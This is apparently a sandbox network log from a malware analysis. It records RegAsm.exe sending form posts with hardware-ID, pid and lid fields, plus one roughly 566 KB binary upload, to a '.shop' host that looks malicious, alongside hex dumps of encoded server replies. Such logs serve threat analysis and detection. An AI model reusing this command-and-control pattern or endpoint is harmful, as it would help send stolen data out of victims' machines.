2024-05-23 22:22:16 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kqf04st0n9i4td900a40smt85f; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLzsMNlgb%2F3nfMqoT%2FTpCY3DhMbnbvN8lIeX41OiVQstmpUN7yooTklgrNkNSeJKlI2aOdvRVNKzU8AYTchE07rPgut0tVx9HZJjCl7jmQKDaSB0VAib1hXqV%2BYqLU95Wq%2BI7PhSJKMPMQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887192eea3184d-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:16 UTC	555	IN	Data Raw: 34 66 63 0d 0a 43 7a 6b 43 67 39 6e 38 6a 61 6f 4b 5a 75 2f 35 34 2b 6d 68 47 45 36 77 42 53 37 71 44 78 62 48 48 4f 52 4b 4e 66 42 46 6f 30 5a 77 4d 77 75 68 72 39 36 33 69 6a 35 4b 35 66 44 42 6d 73 51 36 64 4a 42 78 58 4a 39 71 4f 73 30 56 78 69 74 52 30 6e 2b 44 49 47 70 56 63 65 62 31 39 6f 53 49 5a 78 37 4e 77 38 4f 79 71 78 45 31 75 67 77 6e 79 47 70 34 35 53 62 45 61 45 4b 56 4a 38 59 2b 66 31 78 73 38 4c 43 54 34 2b 70 6e 41 35 75 59 6a 6f 6a 53 63 32 44 5a 61 67 7a 47 42 52 2f 4f 50 6f 45 77 46 38 70 6c 67 51 74 75 54 57 50 4f 75 49 2f 6d 69 43 5a 73 35 76 44 42 6a 4e 55 36 64 4a 41 6e 63 73 68 2f 64 37 56 39 69 54 6c 70 30 6e 2f 59 47 69 6c 51 64 75 61 72 6e 66 6e 44 5a 51 69 63 70 63 48 54 6c 79 68 2b 67 44 55 65 6c 79 30 63 7a 6d 48 75 51 32 Data Ascii: 4fcCzkCg9n8jaoKZu/54+mhGE6wBS7qDxbHHORKNfBFo0ZwMwuhr963ij5K5fDBmsQ6dJBxXJ9qOs0VxitR0n+DIGpVceb19oSIZx7Nw8OyqxE1ugwnyGp45SbEaEKVJ8Y+f1xs8LCT4+pnA5uYjojSc2DZagzGBR/OPoEwF8plgQtuTWPOuI/miCZs5vDBjNU6dJAncsh/d7V9iTlp0n/YGilQduarnfnDZQicpcHTlyh+gDUely0czmHuQ2
2024-05-23 22:22:16 UTC	728	IN	Data Raw: 6c 4d 67 53 4e 6c 47 7a 69 6a 2b 35 6a 68 79 57 55 45 6e 35 4f 4b 67 4d 5a 6f 4a 39 74 71 51 59 68 67 66 71 70 39 68 69 39 64 6d 43 6a 4c 49 47 52 57 5a 75 47 37 33 71 47 67 41 32 2f 4e 6e 4a 6e 4c 6d 7a 68 73 38 57 4a 63 6a 32 46 69 35 30 54 47 51 44 79 4e 61 61 70 6d 4b 7a 4d 4c 2b 4e 50 31 68 49 68 76 43 4d 33 44 77 38 76 4c 66 79 2f 52 62 45 4f 4c 5a 58 2b 33 66 70 51 75 57 70 63 31 78 79 46 6e 55 57 50 7a 73 5a 44 70 79 32 45 50 68 4a 36 47 6a 34 4d 30 52 4c 6b 4d 44 49 39 31 4e 50 30 38 78 67 6c 61 6d 53 76 4c 4d 32 6b 62 43 49 71 6b 30 49 65 6a 63 57 7a 6d 38 4d 47 4d 7a 7a 70 30 6b 43 64 49 69 57 6c 31 6f 58 43 49 4c 46 75 55 4b 63 77 72 62 31 46 67 35 72 47 57 35 38 6c 6c 44 34 4b 62 68 49 62 48 66 43 44 54 59 67 7a 47 42 52 2f 4f 50 6f 45 77 46 Data Ascii: lMgSNlGzij+5jhyWUEn5OKgMZoJ9tqQYhgfqp9hi9dmCjLIGRWZuG73qGgA2/NnJnLmzhs8WJcj2Fi50TGQDyNaapmKzML+NP1hIhvCM3Dw8vLfy/RbEOLZX+3fpQuWpc1xyFnUWPzsZDpy2EPhJ6Gj4M0RLkMDI91NP08xglamSvLM2kbCIqk0IejcWzm8MGMzzp0kCdIiWl1oXCILFuUKcwrb1Fg5rGW58llD4KbhIbHfCDTYgzGBR/OPoEwF
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 33 38 62 38 0d 0a 49 4e 45 6f 5a 45 31 6e 6f 64 50 31 38 49 59 41 62 35 54 7a 36 75 43 44 66 53 43 53 50 77 37 49 61 33 69 67 63 59 67 6f 57 5a 4d 71 78 79 42 6b 57 33 4c 6e 71 5a 6e 75 79 32 73 43 69 4a 2b 42 69 73 5a 2f 4b 4e 70 6a 51 49 63 74 4f 73 30 56 37 57 68 51 69 6d 65 5a 5a 69 6c 30 64 2b 2b 74 6c 66 76 50 65 42 57 33 32 62 53 49 7a 58 51 72 78 43 63 6b 34 33 49 36 7a 52 57 66 51 44 7a 35 5a 38 59 6f 4b 51 4d 69 6f 62 4b 4d 2f 63 78 75 44 34 61 4a 6b 34 48 48 65 79 33 56 61 45 32 44 61 48 69 76 64 59 49 36 58 35 73 6b 30 79 42 70 55 47 72 6e 2b 39 43 48 6f 77 4e 45 69 6f 50 42 30 34 45 36 43 4e 39 33 51 49 4e 37 63 37 56 4c 68 53 5a 5a 6c 54 47 42 54 41 4a 45 4c 6f 6e 51 68 34 65 6a 41 30 53 4b 6c 38 48 54 67 54 6f 6a 33 57 68 45 69 47 78 77 71 Data Ascii: 38b8INEoZE1nodP18IYAb5Tz6uCDfSCSPw7Ia3igcYgoWZMqxyBkW3LnqZnuy2sCiJ+BisZ/KNpjQIctOs0V7WhQimeZZil0d++tlfvPeBW32bSIzXQrxCck43I6zRWfQDz5Z8YoKQMiobKM/cxuD4aJk4HHey3VaE2DaHivdYI6X5sk0yBpUGrn+9CHowNEioPB04E6CN93QIN7c7VLhSZZlTGBTAJELonQh4ejA0SKl8HTgToj3WhEiGxwq
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 38 2b 57 66 47 50 43 6b 44 49 71 47 4c 6b 2b 50 44 5a 45 61 34 6d 49 2b 46 78 47 78 73 75 67 78 54 78 67 55 66 76 42 62 74 51 78 65 56 4b 34 46 38 4b 78 74 76 34 4c 61 55 35 4d 5a 6b 42 59 32 66 67 6f 48 44 64 53 6e 55 62 30 57 49 66 33 4f 71 66 34 63 6a 58 4a 38 70 78 43 56 73 58 43 43 76 30 2f 57 45 69 47 38 63 7a 63 50 44 79 2b 35 54 46 70 49 50 4a 35 63 6a 48 4d 35 6e 37 6b 4d 38 30 69 44 4e 5a 44 45 5a 49 4f 57 78 6e 75 4c 43 59 77 75 4f 6e 49 2b 4c 7a 6e 41 2b 32 6d 64 4d 68 6d 74 31 71 58 75 48 4a 46 53 41 4b 38 63 70 62 31 4e 79 6f 66 58 32 68 4b 4d 6f 41 35 58 62 32 63 6d 44 57 69 66 65 5a 45 43 4a 61 6a 61 45 64 49 55 6a 57 39 41 53 77 69 70 6e 58 48 61 68 30 2f 58 77 68 67 42 76 6c 50 50 71 34 49 4e 39 49 4a 49 2f 44 73 68 70 63 4b 6c 2b 67 53 Data Ascii: 8+WfGPCkDIqGLk+PDZEa4mI+FxGxsugxTxgUfvBbtQxeVK4F8Kxtv4LaU5MZkBY2fgoHDdSnUb0WIf3Oqf4cjXJ8pxCVsXCCv0/WEiG8czcPDy+5TFpIPJ5cjHM5n7kM80iDNZDEZIOWxnuLCYwuOnI+LznA+2mdMhmt1qXuHJFSAK8cpb1NyofX2hKMoA5Xb2cmDWifeZECJajaEdIUjW9ASwipnXHah0/XwhgBvlPPq4IN9IJI/DshpcKl+gS
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 79 43 39 6c 55 47 54 74 73 70 76 70 79 57 30 42 6a 4a 2b 4e 67 63 56 35 4c 39 31 6f 51 34 41 74 4f 73 30 56 37 57 68 51 69 6d 65 5a 5a 69 6c 2b 64 2b 71 31 6d 4b 2b 67 41 78 76 44 38 2b 71 53 71 78 46 48 6b 6d 42 41 79 44 55 32 35 58 4b 50 4c 6c 47 58 4b 38 41 69 59 56 35 6f 35 62 71 59 36 63 74 6e 41 49 69 61 6a 6f 2f 50 64 43 62 54 5a 6b 43 44 59 6e 2b 67 50 73 68 41 50 50 6c 6e 78 6a 77 70 41 79 4b 68 69 70 33 35 33 33 67 49 7a 66 50 71 6c 49 30 53 52 38 73 50 4a 2b 4d 74 63 36 6b 2b 33 6d 6f 58 6b 7a 58 4c 4c 6d 64 65 62 2b 53 34 6b 65 6a 46 62 67 69 48 6b 6f 6d 4e 7a 48 4d 2b 30 57 74 43 6a 32 4e 34 71 33 4f 4d 4b 31 72 53 61 61 6c 50 41 68 74 6e 2b 66 76 47 72 59 68 45 41 34 43 31 69 6f 66 45 4f 6b 53 35 65 41 4c 67 42 6d 33 4e 46 65 31 6f 55 4a 35 Data Ascii: yC9lUGTtspvpyW0BjJ+NgcV5L91oQ4AtOs0V7WhQimeZZil+d+q1mK+gAxvD8+qSqxFHkmBAyDU25XKPLlGXK8AiYV5o5bqY6ctnAIiajo/PdCbTZkCDYn+gPshAPPlnxjwpAyKhip3533gIzfPqlI0SR8sPJ+Mtc6k+3moXkzXLLmdeb+S4kejFbgiHkomNzHM+0WtCj2N4q3OMK1rSaalPAhtn+fvGrYhEA4C1iofEOkS5eALgBm3NFe1oUJ5
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 56 39 72 36 62 65 62 35 38 31 70 44 49 65 54 6a 6f 54 52 65 79 50 62 59 45 65 46 59 6e 71 67 63 4a 51 76 58 4a 6b 76 79 43 70 76 47 79 36 4a 30 50 57 76 7a 33 42 45 31 64 6e 42 76 63 42 30 4a 38 4e 6f 54 34 51 74 48 4d 35 68 79 45 41 38 69 30 2b 71 54 79 6c 63 62 4b 48 6a 33 4b 2f 45 5a 67 53 43 6c 34 32 41 79 33 73 67 33 47 42 4a 67 57 56 38 74 33 2b 43 49 46 61 63 4b 4d 41 67 62 46 35 6b 35 72 2b 59 34 49 67 6d 62 4f 62 77 77 59 7a 62 4f 6e 53 51 4a 32 4f 50 65 46 57 66 50 75 35 44 53 4e 78 50 71 6a 30 42 4d 41 75 68 76 4a 4b 76 6b 43 70 45 68 35 43 46 69 4d 64 2f 49 39 4e 6d 53 70 70 71 66 62 64 77 69 79 64 66 6d 69 37 41 49 47 78 57 5a 75 32 78 6e 2b 6a 47 5a 67 7a 4e 31 65 6e 67 71 44 6f 72 79 69 63 55 79 69 31 56 74 57 57 55 50 6c 71 7a 4b 73 35 6b Data Ascii: V9r6beb581pDIeTjoTReyPbYEeFYnqgcJQvXJkvyCpvGy6J0PWvz3BE1dnBvcB0J8NoT4QtHM5hyEA8i0+qTylcbKHj3K/EZgSCl42Ay3sg3GBJgWV8t3+CIFacKMAgbF5k5r+Y4IgmbObwwYzbOnSQJ2OPeFWfPu5DSNxPqj0BMAuhvJKvkCpEh5CFiMd/I9NmSppqfbdwiydfmi7AIGxWZu2xn+jGZgzN1engqDoryicUyi1VtWWUPlqzKs5k
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 48 6a 33 4b 2f 44 59 41 75 66 6e 6f 69 44 78 33 4d 73 31 6d 31 42 6a 32 31 78 71 48 75 43 4a 6c 4f 56 4a 38 30 72 62 6c 4e 76 35 62 75 52 72 34 59 41 62 2b 62 62 68 70 4f 44 49 6d 36 53 52 30 65 65 54 48 71 75 62 4d 5a 41 50 49 31 70 71 55 39 77 4d 77 75 4b 2b 35 6e 6a 69 44 42 47 7a 5a 57 49 69 73 74 30 49 4e 70 6a 58 6f 68 6d 66 61 70 2f 69 53 68 55 6b 79 33 4a 4e 6d 39 62 61 2b 6d 38 6c 75 76 47 65 67 57 43 32 38 2f 6a 71 42 46 73 31 58 38 4d 30 43 38 30 6c 47 69 42 4c 31 6a 51 44 73 59 2f 61 46 46 6a 36 72 66 65 68 36 4e 33 53 75 58 77 6d 4f 4f 6f 45 57 7a 56 61 77 7a 51 4c 7a 53 6f 63 6f 73 73 52 5a 34 6e 77 53 31 75 55 58 4c 75 74 4a 50 73 79 47 30 57 6a 49 6d 4f 67 4d 5a 35 4b 4e 31 6f 51 49 42 6e 4e 4f 73 57 37 55 4d 58 6c 54 2b 42 66 43 73 62 54 Data Ascii: Hj3K/DYAufnoiDx3Ms1m1Bj21xqHuCJlOVJ80rblNv5buRr4YAb+bbhpODIm6SR0eeTHqubMZAPI1pqU9wMwuK+5njiDBGzZWIist0INpjXohmfap/iShUky3JNm9ba+m8luvGegWC28/jqBFs1X8M0C80lGiBL1jQDsY/aFFj6rfeh6N3SuXwmOOoEWzVawzQLzSocossRZ4nwS1uUXLutJPsyG0WjImOgMZ5KN1oQIBnNOsW7UMXlT+BfCsbT
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 76 69 43 5a 73 35 76 44 42 6a 4e 73 36 64 4a 41 6e 62 35 39 37 66 72 34 2b 37 6b 4e 49 33 45 2b 71 50 51 45 77 43 36 47 38 6b 71 2b 51 4b 6b 53 41 6e 49 2b 44 78 58 51 71 77 47 74 44 6a 6d 31 31 72 33 4f 4b 49 31 43 63 4c 4d 63 68 5a 46 74 6d 35 37 2b 61 36 38 5a 72 52 4d 50 7a 36 75 43 44 66 54 53 53 50 77 37 49 53 6c 6d 55 50 4b 55 2f 51 5a 67 67 7a 54 4a 69 57 6d 50 33 74 6f 36 76 6f 41 4d 62 77 2f 50 71 6b 71 73 52 52 35 4a 67 51 4d 67 31 4e 75 56 31 69 43 31 57 6e 69 33 47 4b 6e 74 61 61 75 32 36 6d 65 6a 44 65 67 2b 66 6b 49 6d 49 7a 58 49 6c 30 6d 6c 4d 69 57 42 30 35 54 44 75 51 7a 7a 53 49 4e 6c 6b 4d 52 6b 67 78 4a 69 4a 2b 63 49 71 4a 35 71 4e 69 34 7a 50 62 43 66 54 5a 46 71 46 66 54 54 4e 46 5a 6c 6d 50 2f 6b 2b 71 55 38 43 47 32 66 74 2b 38 Data Ascii: viCZs5vDBjNs6dJAnb597fr4+7kNI3E+qPQEwC6G8kq+QKkSAnI+DxXQqwGtDjm11r3OKI1CcLMchZFtm57+a68ZrRMPz6uCDfTSSPw7ISlmUPKU/QZggzTJiWmP3to6voAMbw/PqkqsRR5JgQMg1NuV1iC1Wni3GKntaau26mejDeg+fkImIzXIl0mlMiWB05TDuQzzSINlkMRkgxJiJ+cIqJ5qNi4zPbCfTZFqFfTTNFZlmP/k+qU8CG2ft+8
2024-05-23 22:22:16 UTC	1369	IN	Data Raw: 62 38 32 64 77 64 4f 42 4b 6d 4b 36 44 43 66 49 61 57 58 6c 4a 73 52 34 42 63 6c 79 6b 6e 4d 35 43 51 69 4b 70 4e 43 48 6f 33 46 73 35 76 44 42 6e 59 4d 69 62 6f 41 70 4a 4f 4d 47 4e 4c 63 2b 33 6d 6f 58 31 53 6e 4d 4a 57 70 56 59 2f 4f 70 6d 4f 7a 65 61 30 4f 7a 70 61 43 47 79 48 59 68 33 57 78 79 74 6b 78 35 72 6e 4b 4c 4a 31 79 73 47 64 51 6e 5a 31 56 6e 39 36 72 65 6f 61 41 44 62 38 32 55 77 64 4f 42 51 32 79 61 4a 33 50 47 42 52 2f 4f 50 70 35 6f 44 39 42 6e 39 43 64 6e 56 57 66 33 71 74 50 4f 78 57 4d 49 67 4a 53 4b 79 34 30 53 52 37 6b 6e 53 73 67 31 4e 76 55 77 37 6b 4d 38 30 69 50 51 5a 44 45 5a 4d 4c 50 67 79 37 79 66 4f 46 62 6c 38 4a 37 46 71 78 45 31 75 67 77 6e 79 48 73 30 2f 54 7a 55 5a 6a 2f 35 54 49 45 32 4b 51 4d 69 6f 66 79 64 2f 64 70 Data Ascii: b82dwdOBKmK6DCfIaWXlJsR4BclyknM5CQiKpNCHo3Fs5vDBnYMiboApJOMGNLc+3moX1SnMJWpVY/OpmOzea0OzpaCGyHYh3Wxytkx5rnKLJ1ysGdQnZ1Vn96reoaADb82UwdOBQ2yaJ3PGBR/OPp5oD9Bn9CdnVWf3qtPOxWMIgJSKy40SR7knSsg1NvUw7kM80iPQZDEZMLPgy7yfOFbl8J7FqxE1ugwnyHs0/TzUZj/5TIE2KQMiofyd/dp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49740	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:16 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1237 Host: employhabragaomlsp.shop
2024-05-23 22:22:16 UTC	1237	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:16 UTC	808	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6sv23npr5h3egr66cb3duhkd10; expires=Mon, 16-Sep-2024 16:08:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kdc8curgIesYxCCWaygU1ivzLOoqw6aLnz8RZ3jZvm0hgVytSF1cIkyrLoTiPEnlO6g5Uyls6YaS2HoZ%2FXzbGzyzQvlAsmrJLrPV1N9LcqoVHoQ4XP0M1QeRbildo8U1nMGqe3yS8Gf8Zw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871972ab64382-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49741	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:16 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 566526 Host: employhabragaomlsp.shop
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32 6c cb 30 92 6d a1 a4 7d Data Ascii: ;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2l0m}
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: f7 96 71 73 9a 16 d2 33 be 33 fe 53 cd 2c 28 e2 a9 63 f3 03 c0 3d f7 93 d5 f5 93 d7 40 1f 0d ff 79 cc 5b 79 4c 34 3d 46 73 c7 f5 57 5f bd 2e fa 51 af b2 b3 13 c6 4a 5d 66 88 e2 78 46 fa f1 da c9 63 92 48 38 88 6f ec ca e5 63 ff 3c 0b 7d 9b 9e eb dc 64 7f 11 65 29 15 02 ee 53 ee 2f 3f 96 ce 72 7a a4 87 e3 13 53 3c c4 dd 2d 06 97 d0 0c 43 09 50 b2 db 64 4f e0 19 3c 3e e1 c2 d2 d0 3f f1 a2 a7 8a 22 f7 17 24 79 c0 70 a5 ee 8b f2 15 c1 1f 03 fd b9 f5 fa 43 3f ac 05 e9 c5 91 d2 c2 c2 b3 95 ae a1 26 bc a2 ef d1 84 a7 4d 70 43 f1 58 33 4e 69 dc 1e 04 7e d0 e0 4b 78 47 88 08 7b 61 a8 a4 c0 30 eb 8c f2 a2 ea b6 54 b0 72 8e ff f9 b4 8b b8 36 d4 63 7d 62 f6 de bd 3d 2d bf 79 a4 d7 30 0f df 5e bb ee ee 72 c3 e2 eb 28 e9 7b b5 db 0b 4b c3 85 fb 0e 05 88 6a 64 de 04 b8 Data Ascii: qs33S,(c=@y[yL4=FsW_.QJ]fxFcH8oc<}de)S/?rzS<-CPdO<>?"$ypC?&MpCX3Ni~KxG{a0Tr6c}b=-y0^r({Kjd
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 6c ee 64 59 7f 90 8b 66 67 e2 e7 09 61 ae 5b 95 fd c5 c5 23 5b ae 29 e2 29 e2 af d4 66 9f 14 33 cb 95 ff dd 88 f4 e3 ca 73 72 68 0c eb 5f 1d b2 df 0c 3a c6 5b a8 b7 3c 50 a8 99 c3 58 fb fa dd 2a f6 10 9d 87 9a 8b 3e e5 e0 b8 ea 14 7e 68 63 c0 fd be e2 3d cd 45 27 f9 e4 a8 4f 1a 2f 5b 7e 62 6f de da 74 52 ea f9 d4 fb c6 48 9d 1e dc 97 01 c8 75 f0 5a 29 6a 72 eb e5 c6 bb 31 2d 34 cb 60 b6 93 33 70 4b 67 5d 40 22 2e ef 47 06 b7 2e fa 93 a2 f1 23 b8 be dd df 41 14 d4 fc 0c ee 3b fd 57 1d 87 3f c3 92 de 9b 2d 52 28 71 89 1d be d6 ae 69 af 01 8c 60 93 c3 c2 71 4f c2 0f 94 2d de a2 df e0 03 d0 9c c4 01 6b 62 2a 67 8f 32 e9 e4 dc a2 ea a6 41 35 83 79 61 44 26 e6 45 52 68 d4 a8 10 45 e8 44 6d cb 8a 81 fc 83 47 31 8d c1 35 c5 59 7f e9 ed c7 fc c5 77 b4 63 cf 44 e8 Data Ascii: ldYfga[#[))f3srh_:[<PX>~hc=E'O/[~botRHuZ)jr1-4`3pKg]@".G.#A;W?-R(qi`qO-kbg2A5yaD&ERhEDmG15YwcD
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: 1d bf 0c ce 0a 16 9e 3c 4f b7 12 ba 25 95 53 a3 1f a3 15 93 58 45 bf 70 72 1a fc f0 87 de 9a 62 95 42 62 11 7f c1 c1 e5 ff 1a fd 10 50 78 97 bf 30 0f 73 01 03 b6 d0 c0 c0 07 9a 37 47 c8 32 a7 18 21 d2 ad aa cf 20 a9 1e af 97 be 55 87 90 79 d0 70 04 45 3f 3a f7 83 7e 36 85 d1 10 de 27 8a 1f 79 eb 6b ac cf f1 56 eb aa e0 e0 57 74 0d 6c 5f 7c ee 98 93 bc 2a 2e 88 90 79 fc d0 c4 39 d8 03 df 28 31 94 9c 2b 84 70 59 13 a7 b1 2c 60 9b 21 bd 74 66 28 bb 18 f0 02 69 c6 2b 31 1e 11 f0 1e 7f f4 45 f5 f6 4a ba 03 d5 44 c6 e4 24 7f 39 78 96 5d 70 19 0d f3 09 a8 83 97 b9 36 13 d0 29 3e ec da 93 1f 55 a9 a3 c8 1c 6c 5e 2c fe e9 86 a8 3d e3 58 6a 8a 38 de 5f 3b b3 82 b3 0f 1b 59 22 ef 00 65 fa 80 12 2f d1 37 6d 42 f7 49 35 c6 c0 90 4e eb f6 cc fb d1 c4 55 de f7 b2 d6 a6 Data Ascii: <O%SXEprbBbPx0s7G2! UypE?:~6'ykVWtl_\|*.y9(1+pY,`!tf(i+1EJD$9x]p6)>Ul^,=Xj8_;Y"e/7mBI5NU
2024-05-23 22:22:16 UTC	15331	OUT	Data Raw: bc 6a d0 da 3f 60 7b 8e 5e 6a 33 9e b9 31 29 79 41 5c df 77 c5 d5 eb 20 d5 6b 56 49 2e 22 50 e8 30 a9 d9 31 8c 3c 92 5d 68 33 32 af b8 5f b4 ba ca f2 6b a7 b1 ff 45 ed 49 a3 45 77 af 9e 06 a3 57 98 68 d0 5c c4 99 fc 75 b0 ce f5 a6 24 4b 44 b8 f2 4c 92 bb 5a 0c e9 c6 a8 20 a5 06 3e c3 7a 10 71 53 6c 03 cb 6e fd 45 4f c6 8e 47 a4 17 80 31 83 4d 7d b9 66 3d de f7 72 cb b8 c0 d3 a4 9e a8 10 cb 73 b7 1c 77 dd 28 60 d9 ba 65 98 57 19 ef 52 3a 47 93 5c 88 a1 a6 32 97 4f c6 59 59 29 65 28 f7 c5 66 88 89 c5 cb 7c 59 fd 59 9f c3 e4 e5 ff 41 3a 4f bb 39 8b b9 2f 3b a9 b7 b9 ef 1c 6b 2b 43 e8 93 9c d6 12 78 12 d7 66 00 9f 65 bb a9 32 4a 25 9f 29 24 a9 0b f0 d5 84 fd 62 35 fc 23 52 65 e2 84 ab ca ef 26 78 0b 1c f2 e6 74 9a 3a 25 4a 3d 5b 95 42 d1 ff 65 ce b5 06 16 73 Data Ascii: j?`{^j31)yA\w kVI."P01<]h32_kEIEwWh\u$KDLZ >zqSlnEOG1M}f=rsw(`eWR:G\2OYY)e(f\|YYA:O9/;k+Cxfe2J%)$b5#Re&xt:%J=[Bes
